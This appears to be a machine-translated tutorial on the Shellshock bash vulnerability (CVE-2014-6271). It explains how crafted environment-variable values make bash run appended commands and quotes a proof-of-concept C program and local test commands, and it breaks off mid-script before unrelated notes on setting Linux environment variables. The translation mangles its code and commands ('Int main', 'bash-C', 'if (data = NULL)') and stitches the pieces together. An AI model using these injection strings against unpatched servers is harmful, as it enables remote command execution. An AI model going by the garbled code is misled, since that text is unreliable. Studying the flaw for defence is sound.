Bash environment variable parsing vulnerability for beginners

Bash environment variable parsing vulnerability for beginners
1. What are environment variables?

Both Windows and Linux programs support environment variables. Generally, environment variables are stored at the beginning of the process memory space as value strings. When you execute a program, you can specify the environment variables to pass information to the program to be executed. On a Windows platform dominated by GUI, generally, users seldom need to use environment variables to transmit information to programs. Environment variables are resources in the process space. Environment Variables of different processes cannot be shared. However, you can copy the environment variables of the parent process to the child process through the process resource Inheritance Mechanism. For example, the environment variables set for the bash process are automatically copied to the subprocesses started through bash.

Different programs have different degrees of application to environment variables. Many small programs can ignore environment variables. However, many programs depend heavily on environment variables, such as CGI programs for Web applications. All the form data is transmitted to CGI programs by the web server process in the form of environment variables. Below is a simple CGI program written in C language.

Int main (void) {char * data; long m, n; printf ("% s % c", "Content-Type: text/html; charset = gb2312 ", 13, 10); printf ("<TITLE> multiplication result </TITLE>"); printf ("<H3> multiplication result </H3> "); data = getenv ("QUERY_STRING"); if (data = NULL) printf ("<P> error! Data is not input or there is a problem with data transmission "); else if (sscanf (data," m = % ld & n = % ld ", & m, & n )! = 2) printf ("<P> error! The input data is invalid. The number must be entered in the form. "); Else printf (" <P> % ld and % ld: % ld. ", M, n, m * n); return 0 ;}

It can be seen that the GET request string sent from the client is passed to this program through the Environment Variable QUERY_STRING.

Bash is also a heavy user of environment variables. Of course, CGI programs written in bash are more dependent on environment variables. The following is a CGI program written in bash.

#!/bin/bash    echo 'Content-type: test/html'  echo ''  echo $QUERY_STRING  

The environmental variable QUERY_STRING is also used.

2. bash Vulnerability Analysis of Environment Variables

As mentioned above, environment variables are special strings and must be analyzed and processed by environment variables. String processing is a very important task in most programs. It is more important for Web programs (html, xml, json file content itself is a string ).

Bash is no exception. It needs to analyze the environment variable string, then explain its meaning and perform related operations. Since the bash script itself is a text string, the bash engine can simply convert the environment variable string into a string in the script format and merge it with the bash script to be executed, then explain and execute the merged script.

For example, the following script:

The value of echo environment variable X is $ X.

If the environment variable is X = 100, the combined environment is equivalent:

X = 100 the value of echo environment variable X is $ X

We can use the env tool to test the effect. env is used to specify environment variables for the program to be executed.

[Root @ localhost ~] # Env X = 100 bash-c 'echo environment variable X: $ x'; environment variable X: 100

Then construct an environment variable for a special point.

[Root @ localhost ~] # Env X = '() {echo I am an environment variable;}; 'bash-C' env'; HOSTNAME = localhost. localdomain .... omit show irrelevant environment variable SSH_CONNECTION = 172.16.35.220 60128 172.16.35.135 22 LESSOPEN = |/usr/bin/lesspipe. sh % sG_BROKEN_FILENAMES = 1X = () {echo I am an environment variable}

At this time, the environment variable X is only a string, but bash interprets it as a function type rather than a string type value. So you can directly execute this function. As follows:

[Root @ localhost ~] # Env X = '() {echo I am an environment variable;}; 'bash-C' x'; I am an environment variable

In this case, bash interprets the environment variables and converts them to the following script:

X () {echo I am an environment variable ;};

Instead of copying it as X = () {echo I am an environment variable ;};

It can be seen that bash has different interpretations of environment variable values in different string formats.

Continue to make the value of X more complex, as shown below:

[Root @ localhost ~] # Env X = '() {echo I am an environment variable;}; echo you recruited 'bash-C' env' and you recruited HOSTNAME = localhost. localdomainSHELL =/bin/bashSSH_CONNECTION = 172.16.35.220 60128 172.16.35.135 22 LESSOPEN = |/usr/bin/lesspipe. sh % sG_BROKEN_FILENAMES = 1X = () {echo I am an environment variable }_=/bin/env

The problem has occurred! In this case, the value of environment variable X set by env for bash is

() {Echo: I'm an environment variable;}; echo: you caught it.

Bash interprets the first half as the function body of Function X, but does not do anything about the second half. It is directly converted into a script as it is. The script is as follows:

X () {echo: I'm an environment variable;}; echo: You got it.

The merged script is as follows:

X () {echo I am an environment variable;}; echo you recruited env

In this way, you can directly execute echo. In fact, this command can be replaced with any other command, so that bash can execute any command. This is the basic principle of this bash vulnerability.

Let's take a look at the effect after patching.

[Root @ localhost ~] # Env X = '() {echo I am an environment variable;}; echo you recruited 'bash-C' env 'hostname = localhost. localdomainSHELL =/bin/bashX = () {echo I am an environment variable;}; echo you recruited PATH =/usr/local/sbin:/usr/local/bin: /sbin:/bin:/usr/sbin:/usr/bin:/root/bin _ =/bin/env [root @ localhost ~] # Env X = '() {echo I am an environment variable;}; echo you recruited 'bash-C' echo $ x' () {echo I am an environment variable ;}; echo, you got a trick.

It can be seen that bash does not regard X as a function to explain at this time, but assigns all the environment variable values as pure strings to X.

3. Who will be affected by the bash vulnerability?

Through the above principle analysis, we know that any program that can pass environment variables to bash through some means is affected by this. Of course, the most typical is the CGI program written by bash. The client adds the value () {echo I am an environment variable;} in the request string; echo the form value you recruited, attackers can easily attack the servers running CGI.

At present, most general websites seldom use CGI, so the problem is not too big. However, there are many network devices, such as vro switches, which use CGI programs written in perl or other languages. As long as bash is called at the underlying layer, there is a great risk.

Currently, patches for this vulnerability have been released. Please add them as soon as possible. Unfortunately, there is still another vulnerability in the leaked file content after the patch is installed. For details, refer to the following reprinted article: https://raw.githubusercontent.com/citypw/DNFWAH/master/4/d4_0x07_DNFWAH_shellshock_bash_story_cve-2014-6271.txt

[Sth0r @ shawn-fortress] $ uname-aLinux shawn-fortress 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0 + kali8 i686 GNU/Linux |=|=----- = [d o n o t f u c k w I T H A C K E R] ==||=||=-------------------------- [#4 File 0x07] ------------------------- = | = -------------------- --------------------------------------------- = | = ------------------- = [Bash Shellshock event:] = -------------------- = | = --------------------- = [CVE-2014-6271 Data Summary] = -------------------- = | = threads = [By Shawn the R0ck] = threads = | = threads = | = ----------- ------------ = [Sep 25 2014] = ------------------------ = | = contents = | -- [Content0. What is BASH1. CVE-2014-62712. incomplete patch and story to be continued... -- [0. what is BASHBourne Again Shell (BASH), the most popular SHELL implementation on GNU/Linux, was born in 1980, after decades of evolution, a simple terminal command line interpreter has evolved into a multi-functional interface deeply integrated with the GNU system. -- [1. CVE-2014-6271 French GNU/Linux enthusiast Stéphane Chazelas found a famous SHELL implementation BASH vulnerability in middle September 2014, you can by constructing the value of environment variables to execute the script code you want to execute, according to reports, this vulnerability affects many applications running on GNU/Linux that interact with BASH, including: ** in sshd configuration, ForceCommand is used to restrict remote users from executing commands. This vulnerability can bypass the restriction to execute any commands. Some restrictions on the deployment environment of Git and Subversion Shell will also show similar situations. OpenSSH is usually used normally. ** The Apache server uses mod_cgi or mod_cgid. If the CGI script is in BASH or runs in a sub-SHELL, it will be affected. Use C's system/popen in the sub-Shell, and OS in Python. system/OS. this vulnerability affects the use of open/system in popen, PHP in system/exec (CGI Mode), and Perl. ** PHP script execution in mod_php will not be affected. ** The DHCP client can exploit this vulnerability to call shell scripts to receive environment variable parameter values of remote malicious servers. ** The daemon and SUID programs may also be affected to execute SHELL scripts in the environment where environment variables are set. ** Any other program executing SHELL scripts using BASH as the interpreter may be affected. If the Shell script is not exported, it will not be affected. Let's take a look at a simple POC: 1. test whether a vulnerability exists in the local SHELL Environment: $ env x = '(){:;}; echo vulnerable 'bash-c "echo this is a test" if the vulnerability exists, "vulnerable" is printed ". 2, C program: idea/* CVE-2014-6271 + aliases with slashes PoC-je [at] clevcode [dot] org */# include <unistd. h> # include <stdio. h> int main () {char * envp [] = {"PATH =/bin:/usr/bin", "/usr/bin/id = () {"" echo pwn me twice, shame on me ;}; "" echo pwn me once, shame on you ", NULL }; char * argv [] = {"/bin/bash", NULL}; execve (argv [0], Argv, envp); perror ("execve"); return 1;} je @ tiny :~ $ Gcc-o bash-is-fun bash-is-fun.cje @ tiny :~ $. /Bash-is-funpwn me once, shame on youje @ tiny:/home/je $/usr/bin/idpwn me twice, shame on me -------------------------------------------------------------- in this POC, we can see that BASH is not processing the end. We can see why through patches later. 3. Test the HTTP environment on INVISIBLETHREAT: Create a script named poc. cgi :#! /Bin/bash echo "Content-type: text/html "echo" "echo '

A problem occurred when changing the linux bash environment variable. The variable setting does not automatically save $ echo $ LINES 24 to 25, but the variable remains unchanged.
Echo is a command. The $ symbol echo is changed to a variable, so the command cannot be found.
Set the variable to directly use the variable name = variable value. When referencing a variable, add the $ symbol before the variable.
For example:
Set variables (assign values to variables)
[Root @ localhost root] # LINES = 24
Reference variable (DISPLAY variable value)
[Root @ localhost root] # echo $ LINES

Changing Environment Variables in linux
Linux variables are divided by the life cycle of variables. They can be divided into two types:
(1) permanent: the configuration file needs to be modified, and the variable takes effect permanently.
Common configuration files include:
(1-1)/etc/profile: This file takes effect for all users. This file sets the environment information for each user in the system. This file is executed when the user logs on for the first time; and from/etc/profile. configure shell collection in the configuration file of the d directory
For example, edit the/etc/profile file and add the CLASSPATH variable.
# Vi/etc/profile
Add a row:
Export CLASSPATH =./JAVA_HOME/lib; $ JAVA_HOME/jre/lib
After modification, You need to execute a new login to take effect, you can also execute the command source/etc/profile to take effect

(1-2)/etc/bashrc: effective for all users. Execute this file for every user running bash shell. When bash shell is opened, this file is read
The editing method is described above.

(1-3 )~ /. Bash_profile: it is only valid for the current user. Each user can use this file to enter the shell information dedicated to his/her use. When the user logs on, the file is executed only once.
For example, edit the. bash_profile under the guok user directory (/home/guok ).
$ Vi/home/guok/. bash. profile
Add the following content:
Export CLASSPATH =./JAVA_HOME/lib; $ JAVA_HOME/jre/lib
After modification, You need to execute a new login to take effect, you can also execute the command source/etc/profile to take effect

(1-4 )~ /. Bashrc: only valid for the current user. The file contains bash information dedicated to your bash shell. The file is read when you log on and each time you open a new shell.
The editing method is described above.

In addition ,~ The variables (local) set in/. bashrc can only inherit the variables in/etc/profile. They are "Parent-Child" relationships.

Summary: to modify the above files, add the variables you need. When you start a shell (terminal, terminal), all the variables you define will take effect.

(2) Temporary: Use the export command to declare the variable. The variable is valid only in the current shell (BASH) or its subshell (BASH) and fails after the shell is closed, this variable is not available when the new shell is opened. You need to redefine it if you need to use it.
Use the [export variable name = variable value] to define the variable under the shell command line.

View environment variables
(1) Use the echo command to view a single environment variable. For example:
Echo $ PATH
(2) Use env to view all environment variables. For example:
Env
(3) Use set to view all locally defined environment variables. For example:
Set
In addition, unset can delete specified environment variables.

Common Environment Variables
PATH determines the directories to which shell will look for commands or programs.
HOME main directory of the current user
HISTSIZE
LOGNAME: The Login Name of the current user.
HOSTNAME indicates the host name.
SHELL Current User Shell Type
LANG ...... remaining full text>